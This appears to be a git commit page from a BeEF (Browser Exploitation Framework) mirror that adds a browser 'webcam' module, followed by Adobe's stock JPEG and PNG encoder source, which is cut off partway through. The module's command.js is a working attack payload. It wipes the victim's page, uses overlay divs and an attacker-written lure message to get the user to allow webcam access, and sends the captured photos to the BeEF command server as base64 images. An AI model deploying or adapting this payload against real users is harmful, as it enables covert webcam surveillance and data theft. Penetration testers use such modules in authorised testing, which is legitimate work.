Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added webcam module

Browse Source
This commit is contained in:
floyd
2012-06-06 18:47:48 +01:00
parent defc5987c7
commit dbae1f60dd
10 changed files with 1096 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

70
modules/browser/webcam/command.js Normal file
View File

@@ -0,0 +1,70 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
/*
If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons:
- Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox
- There is a bug in flash: http://forums.adobe.com/thread/880967
- You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the
body_social_engineer_and_overlay below and try again.
*/
//The social engineering message and the overlay div's
var body_social_engineer_and_overlay = '<div class="thingy" style="position:absolute;top:0px;left:0px;width:800px;height:109px"></div> <div class="thingy" style="position:absolute;top:105px;left:0px;width:100px;height:315px"></div> <div class="thingy" style="position:absolute;top:105px;left:315px;width:570px;height:315px"></div> <div class="thingy" style="position:absolute;top:248px;left:0px;width:400px;height:280px"></div><div class="text" style="position:absolute;top:20px;left:50px;z-index:100"> <h2 style="margin:0"><%= @social_engineering_title %></h2> <p style="width: 500px; font-size: 14px; margin:0"><%= @social_engineering_text %></p></div>';
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }';
//This function is called by swfobject, if if fails to add the flash file to the page
js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
//Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed)
//We'll notice when flash is not installed anyway...
//var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"><div><h1>You need FlashPlayer 9 or higher!</h1><p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p></div></div>';
var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"></div>';
//The style is the only thing we already append to the head
var theHead = document.getElementsByTagName("head")[0];
var style = document.createElement('style');
style.type = 'text/css';
style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }';
theHead.appendChild(style);
//A nice library that helps us to include the swf file
var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Empty body first
$j('body').html('');
//Now show our flash stuff, muahahaha
$j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script);
});

25
modules/browser/webcam/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
webcam:
enable: true
category: "Browser"
name: "Webcam"
description: "This module will show the Adobe Flash allow webcam dialog to the user. The user has to click the allow button, otherwise this module will not return pictures. The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string."
authors: ["floyd @floyd_ch"]
target:
working: ["All"]

39
modules/browser/webcam/dev/com/adobe/images/BitString.as Executable file
View File

@@ -0,0 +1,39 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
public class BitString
{
public var len:int = 0;
public var val:int = 0;
}
}

648
modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as Executable file
View File

@@ -0,0 +1,648 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
import flash.geom.*;
import flash.display.*;
import flash.utils.*;
/**
* Class that converts BitmapData into a valid JPEG
*/
public class JPGEncoder
{
// Static table initialization
private var ZigZag:Array = [
0, 1, 5, 6,14,15,27,28,
2, 4, 7,13,16,26,29,42,
3, 8,12,17,25,30,41,43,
9,11,18,24,31,40,44,53,
10,19,23,32,39,45,52,54,
20,22,33,38,46,51,55,60,
21,34,37,47,50,56,59,61,
35,36,48,49,57,58,62,63
];
private var YTable:Array = new Array(64);
private var UVTable:Array = new Array(64);
private var fdtbl_Y:Array = new Array(64);
private var fdtbl_UV:Array = new Array(64);
private function initQuantTables(sf:int):void
{
var i:int;
var t:Number;
var YQT:Array = [
16, 11, 10, 16, 24, 40, 51, 61,
12, 12, 14, 19, 26, 58, 60, 55,
14, 13, 16, 24, 40, 57, 69, 56,
14, 17, 22, 29, 51, 87, 80, 62,
18, 22, 37, 56, 68,109,103, 77,
24, 35, 55, 64, 81,104,113, 92,
49, 64, 78, 87,103,121,120,101,
72, 92, 95, 98,112,100,103, 99
];
for (i = 0; i < 64; i++) {
t = Math.floor((YQT[i]*sf+50)/100);
if (t < 1) {
t = 1;
} else if (t > 255) {
t = 255;
}
YTable[ZigZag[i]] = t;
}
var UVQT:Array = [
17, 18, 24, 47, 99, 99, 99, 99,
18, 21, 26, 66, 99, 99, 99, 99,
24, 26, 56, 99, 99, 99, 99, 99,
47, 66, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99
];
for (i = 0; i < 64; i++) {
t = Math.floor((UVQT[i]*sf+50)/100);
if (t < 1) {
t = 1;
} else if (t > 255) {
t = 255;
}
UVTable[ZigZag[i]] = t;
}
var aasf:Array = [
1.0, 1.387039845, 1.306562965, 1.175875602,
1.0, 0.785694958, 0.541196100, 0.275899379
];
i = 0;
for (var row:int = 0; row < 8; row++)
{
for (var col:int = 0; col < 8; col++)
{
fdtbl_Y[i] = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
i++;
}
}
}
private var YDC_HT:Array;
private var UVDC_HT:Array;
private var YAC_HT:Array;
private var UVAC_HT:Array;
private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array
{
var codevalue:int = 0;
var pos_in_table:int = 0;
var HT:Array = new Array();
for (var k:int=1; k<=16; k++) {
for (var j:int=1; j<=nrcodes[k]; j++) {
HT[std_table[pos_in_table]] = new BitString();
HT[std_table[pos_in_table]].val = codevalue;
HT[std_table[pos_in_table]].len = k;
pos_in_table++;
codevalue++;
}
codevalue*=2;
}
return HT;
}
private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0];
private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d];
private var std_ac_luminance_values:Array = [
0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12,
0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07,
0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08,
0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0,
0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16,
0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28,
0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39,
0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49,
0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,
0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,
0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,
0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89,
0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,
0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,
0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,
0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5,
0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,
0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2,
0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,
0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
0xf9,0xfa
];
private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0];
private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
private var std_ac_chrominance_nrcodes:Array = [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77];
private var std_ac_chrominance_values:Array = [
0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21,
0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71,
0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91,
0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0,
0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34,
0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26,
0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38,
0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48,
0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58,
0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,
0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,
0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87,
0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96,
0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,
0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,
0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3,
0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2,
0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,
0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,
0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
0xf9,0xfa
];
private function initHuffmanTbl():void
{
YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values);
UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values);
YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values);
UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values);
}
private var bitcode:Array = new Array(65535);
private var category:Array = new Array(65535);
private function initCategoryNumber():void
{
var nrlower:int = 1;
var nrupper:int = 2;
var nr:int;
for (var cat:int=1; cat<=15; cat++) {
//Positive numbers
for (nr=nrlower; nr<nrupper; nr++) {
category[32767+nr] = cat;
bitcode[32767+nr] = new BitString();
bitcode[32767+nr].len = cat;
bitcode[32767+nr].val = nr;
}
//Negative numbers
for (nr=-(nrupper-1); nr<=-nrlower; nr++) {
category[32767+nr] = cat;
bitcode[32767+nr] = new BitString();
bitcode[32767+nr].len = cat;
bitcode[32767+nr].val = nrupper-1+nr;
}
nrlower <<= 1;
nrupper <<= 1;
}
}
// IO functions
private var byteout:ByteArray;
private var bytenew:int = 0;
private var bytepos:int = 7;
private function writeBits(bs:BitString):void
{
var value:int = bs.val;
var posval:int = bs.len-1;
while ( posval >= 0 ) {
if (value & uint(1 << posval) ) {
bytenew |= uint(1 << bytepos);
}
posval--;
bytepos--;
if (bytepos < 0) {
if (bytenew == 0xFF) {
writeByte(0xFF);
writeByte(0);
}
else {
writeByte(bytenew);
}
bytepos=7;
bytenew=0;
}
}
}
private function writeByte(value:int):void
{
byteout.writeByte(value);
}
private function writeWord(value:int):void
{
writeByte((value>>8)&0xFF);
writeByte((value )&0xFF);
}
// DCT & quantization core
private function fDCTQuant(data:Array, fdtbl:Array):Array
{
var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number;
var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number;
var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number;
var i:int;
/* Pass 1: process rows. */
var dataOff:int=0;
for (i=0; i<8; i++) {
tmp0 = data[dataOff+0] + data[dataOff+7];
tmp7 = data[dataOff+0] - data[dataOff+7];
tmp1 = data[dataOff+1] + data[dataOff+6];
tmp6 = data[dataOff+1] - data[dataOff+6];
tmp2 = data[dataOff+2] + data[dataOff+5];
tmp5 = data[dataOff+2] - data[dataOff+5];
tmp3 = data[dataOff+3] + data[dataOff+4];
tmp4 = data[dataOff+3] - data[dataOff+4];
/* Even part */
tmp10 = tmp0 + tmp3; /* phase 2 */
tmp13 = tmp0 - tmp3;
tmp11 = tmp1 + tmp2;
tmp12 = tmp1 - tmp2;
data[dataOff+0] = tmp10 + tmp11; /* phase 3 */
data[dataOff+4] = tmp10 - tmp11;
z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
data[dataOff+2] = tmp13 + z1; /* phase 5 */
data[dataOff+6] = tmp13 - z1;
/* Odd part */
tmp10 = tmp4 + tmp5; /* phase 2 */
tmp11 = tmp5 + tmp6;
tmp12 = tmp6 + tmp7;
/* The rotator is modified from fig 4-8 to avoid extra negations. */
z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
z3 = tmp11 * 0.707106781; /* c4 */
z11 = tmp7 + z3; /* phase 5 */
z13 = tmp7 - z3;
data[dataOff+5] = z13 + z2; /* phase 6 */
data[dataOff+3] = z13 - z2;
data[dataOff+1] = z11 + z4;
data[dataOff+7] = z11 - z4;
dataOff += 8; /* advance pointer to next row */
}
/* Pass 2: process columns. */
dataOff = 0;
for (i=0; i<8; i++) {
tmp0 = data[dataOff+ 0] + data[dataOff+56];
tmp7 = data[dataOff+ 0] - data[dataOff+56];
tmp1 = data[dataOff+ 8] + data[dataOff+48];
tmp6 = data[dataOff+ 8] - data[dataOff+48];
tmp2 = data[dataOff+16] + data[dataOff+40];
tmp5 = data[dataOff+16] - data[dataOff+40];
tmp3 = data[dataOff+24] + data[dataOff+32];
tmp4 = data[dataOff+24] - data[dataOff+32];
/* Even part */
tmp10 = tmp0 + tmp3; /* phase 2 */
tmp13 = tmp0 - tmp3;
tmp11 = tmp1 + tmp2;
tmp12 = tmp1 - tmp2;
data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */
data[dataOff+32] = tmp10 - tmp11;
z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
data[dataOff+16] = tmp13 + z1; /* phase 5 */
data[dataOff+48] = tmp13 - z1;
/* Odd part */
tmp10 = tmp4 + tmp5; /* phase 2 */
tmp11 = tmp5 + tmp6;
tmp12 = tmp6 + tmp7;
/* The rotator is modified from fig 4-8 to avoid extra negations. */
z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
z3 = tmp11 * 0.707106781; /* c4 */
z11 = tmp7 + z3; /* phase 5 */
z13 = tmp7 - z3;
data[dataOff+40] = z13 + z2; /* phase 6 */
data[dataOff+24] = z13 - z2;
data[dataOff+ 8] = z11 + z4;
data[dataOff+56] = z11 - z4;
dataOff++; /* advance pointer to next column */
}
// Quantize/descale the coefficients
for (i=0; i<64; i++) {
// Apply the quantization and scaling factor & Round to nearest integer
data[i] = Math.round((data[i]*fdtbl[i]));
}
return data;
}
// Chunk writing
private function writeAPP0():void
{
writeWord(0xFFE0); // marker
writeWord(16); // length
writeByte(0x4A); // J
writeByte(0x46); // F
writeByte(0x49); // I
writeByte(0x46); // F
writeByte(0); // = "JFIF",'\0'
writeByte(1); // versionhi
writeByte(1); // versionlo
writeByte(0); // xyunits
writeWord(1); // xdensity
writeWord(1); // ydensity
writeByte(0); // thumbnwidth
writeByte(0); // thumbnheight
}
private function writeSOF0(width:int, height:int):void
{
writeWord(0xFFC0); // marker
writeWord(17); // length, truecolor YUV JPG
writeByte(8); // precision
writeWord(height);
writeWord(width);
writeByte(3); // nrofcomponents
writeByte(1); // IdY
writeByte(0x11); // HVY
writeByte(0); // QTY
writeByte(2); // IdU
writeByte(0x11); // HVU
writeByte(1); // QTU
writeByte(3); // IdV
writeByte(0x11); // HVV
writeByte(1); // QTV
}
private function writeDQT():void
{
writeWord(0xFFDB); // marker
writeWord(132); // length
writeByte(0);
var i:int;
for (i=0; i<64; i++) {
writeByte(YTable[i]);
}
writeByte(1);
for (i=0; i<64; i++) {
writeByte(UVTable[i]);
}
}
private function writeDHT():void
{
writeWord(0xFFC4); // marker
writeWord(0x01A2); // length
var i:int;
writeByte(0); // HTYDCinfo
for (i=0; i<16; i++) {
writeByte(std_dc_luminance_nrcodes[i+1]);
}
for (i=0; i<=11; i++) {
writeByte(std_dc_luminance_values[i]);
}
writeByte(0x10); // HTYACinfo
for (i=0; i<16; i++) {
writeByte(std_ac_luminance_nrcodes[i+1]);
}
for (i=0; i<=161; i++) {
writeByte(std_ac_luminance_values[i]);
}
writeByte(1); // HTUDCinfo
for (i=0; i<16; i++) {
writeByte(std_dc_chrominance_nrcodes[i+1]);
}
for (i=0; i<=11; i++) {
writeByte(std_dc_chrominance_values[i]);
}
writeByte(0x11); // HTUACinfo
for (i=0; i<16; i++) {
writeByte(std_ac_chrominance_nrcodes[i+1]);
}
for (i=0; i<=161; i++) {
writeByte(std_ac_chrominance_values[i]);
}
}
private function writeSOS():void
{
writeWord(0xFFDA); // marker
writeWord(12); // length
writeByte(3); // nrofcomponents
writeByte(1); // IdY
writeByte(0); // HTY
writeByte(2); // IdU
writeByte(0x11); // HTU
writeByte(3); // IdV
writeByte(0x11); // HTV
writeByte(0); // Ss
writeByte(0x3f); // Se
writeByte(0); // Bf
}
// Core processing
private var DU:Array = new Array(64);
private function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number
{
var EOB:BitString = HTAC[0x00];
var M16zeroes:BitString = HTAC[0xF0];
var i:int;
var DU_DCT:Array = fDCTQuant(CDU, fdtbl);
//ZigZag reorder
for (i=0;i<64;i++) {
DU[ZigZag[i]]=DU_DCT[i];
}
var Diff:int = DU[0] - DC; DC = DU[0];
//Encode DC
if (Diff==0) {
writeBits(HTDC[0]); // Diff might be 0
} else {
writeBits(HTDC[category[32767+Diff]]);
writeBits(bitcode[32767+Diff]);
}
//Encode ACs
var end0pos:int = 63;
for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) {
};
//end0pos = first element in reverse order !=0
if ( end0pos == 0) {
writeBits(EOB);
return DC;
}
i = 1;
while ( i <= end0pos ) {
var startpos:int = i;
for (; (DU[i]==0) && (i<=end0pos); i++) {
}
var nrzeroes:int = i-startpos;
if ( nrzeroes >= 16 ) {
for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) {
writeBits(M16zeroes);
}
nrzeroes = int(nrzeroes&0xF);
}
writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]);
writeBits(bitcode[32767+DU[i]]);
i++;
}
if ( end0pos != 63 ) {
writeBits(EOB);
}
return DC;
}
private var YDU:Array = new Array(64);
private var UDU:Array = new Array(64);
private var VDU:Array = new Array(64);
private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void
{
var pos:int=0;
for (var y:int=0; y<8; y++) {
for (var x:int=0; x<8; x++) {
var P:uint = img.getPixel32(xpos+x,ypos+y);
var R:Number = Number((P>>16)&0xFF);
var G:Number = Number((P>> 8)&0xFF);
var B:Number = Number((P )&0xFF);
YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128;
UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B));
VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B));
pos++;
}
}
}
/**
* Constructor for JPEGEncoder class
*
* @param quality The quality level between 1 and 100 that detrmines the
* level of compression used in the generated JPEG
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public function JPGEncoder(quality:Number = 50)
{
if (quality <= 0) {
quality = 1;
}
if (quality > 100) {
quality = 100;
}
var sf:int = 0;
if (quality < 50) {
sf = int(5000 / quality);
} else {
sf = int(200 - quality*2);
}
// Create tables
initHuffmanTbl();
initCategoryNumber();
initQuantTables(sf);
}
/**
* Created a JPEG image from the specified BitmapData
*
* @param image The BitmapData that will be converted into the JPEG format.
* @return a ByteArray representing the JPEG encoded image data.
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public function encode(image:BitmapData):ByteArray
{
// Initialize bit writer
byteout = new ByteArray();
bytenew=0;
bytepos=7;
// Add JPEG headers
writeWord(0xFFD8); // SOI
writeAPP0();
writeDQT();
writeSOF0(image.width,image.height);
writeDHT();
writeSOS();
// Encode 8x8 macroblocks
var DCY:Number=0;
var DCU:Number=0;
var DCV:Number=0;
bytenew=0;
bytepos=7;
for (var ypos:int=0; ypos<image.height; ypos+=8) {
for (var xpos:int=0; xpos<image.width; xpos+=8) {
RGB2YUV(image, xpos, ypos);
DCY = processDU(YDU, fdtbl_Y, DCY, YDC_HT, YAC_HT);
DCU = processDU(UDU, fdtbl_UV, DCU, UVDC_HT, UVAC_HT);
DCV = processDU(VDU, fdtbl_UV, DCV, UVDC_HT, UVAC_HT);
}
}
// Do the bit alignment of the EOI marker
if ( bytepos >= 0 ) {
var fillbits:BitString = new BitString();
fillbits.len = bytepos+1;
fillbits.val = (1<<(bytepos+1))-1;
writeBits(fillbits);
}
writeWord(0xFFD9); //EOI
return byteout;
}
}
}

141
modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as Executable file
View File

@@ -0,0 +1,141 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
import flash.geom.*;
import flash.display.Bitmap;
import flash.display.BitmapData;
import flash.utils.ByteArray;
/**
* Class that converts BitmapData into a valid PNG
*/
public class PNGEncoder
{
/**
* Created a PNG image from the specified BitmapData
*
* @param image The BitmapData that will be converted into the PNG format.
* @return a ByteArray representing the PNG encoded image data.
* @langversion ActionScript 3.0
* @playerversion Flash 9.0
* @tiptext
*/
public static function encode(img:BitmapData):ByteArray {
// Create output byte array
var png:ByteArray = new ByteArray();
// Write PNG signature
png.writeUnsignedInt(0x89504e47);
png.writeUnsignedInt(0x0D0A1A0A);
// Build IHDR chunk
var IHDR:ByteArray = new ByteArray();
IHDR.writeInt(img.width);
IHDR.writeInt(img.height);
IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA
IHDR.writeByte(0);
writeChunk(png,0x49484452,IHDR);
// Build IDAT chunk
var IDAT:ByteArray= new ByteArray();
for(var i:int=0;i < img.height;i++) {
// no filter
IDAT.writeByte(0);
var p:uint;
var j:int;
if ( !img.transparent ) {
for(j=0;j < img.width;j++) {
p = img.getPixel(j,i);
IDAT.writeUnsignedInt(
uint(((p&0xFFFFFF) << 8)|0xFF));
}
} else {
for(j=0;j < img.width;j++) {
p = img.getPixel32(j,i);
IDAT.writeUnsignedInt(
uint(((p&0xFFFFFF) << 8)|
(p>>>24)));
}
}
}
IDAT.compress();
